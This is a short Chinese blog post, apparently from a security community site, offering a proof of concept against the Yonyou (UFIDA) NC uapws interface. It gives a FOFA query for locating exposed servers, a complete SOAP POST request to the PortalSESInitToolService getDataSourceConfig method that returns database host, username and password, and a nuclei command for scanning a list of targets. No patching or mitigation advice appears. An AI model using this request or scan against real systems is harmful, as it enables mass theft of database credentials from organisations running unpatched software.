用友nc uapws接口获取数据库账户密码 nuclei

漏洞描述

用友nc uapws接口老版本存在数据库账号密码泄露,前面写过接口poc,补充一个获取数据库用户密码的poc
 


 

FOFA

app="用友-UFIDA-NC"

 


 

漏洞复现

利用请求包

POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
 <soapenv:Header/>
 <soapenv:Body>
    <por:getDataSourceConfig/>
 </soapenv:Body>
</soapenv:Envelope

图片[1]-用友nc uapws接口获取数据库账户密码 nuclei-孤勇者社区

可获取数据库地址,用户名密码

nuclei-pocs

nuclei  -t  yonyou_NC-uapws-database-read.yaml -l url.txt

图片[2]-用友nc uapws接口获取数据库账户密码 nuclei-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像市机0
    • 头像韩的0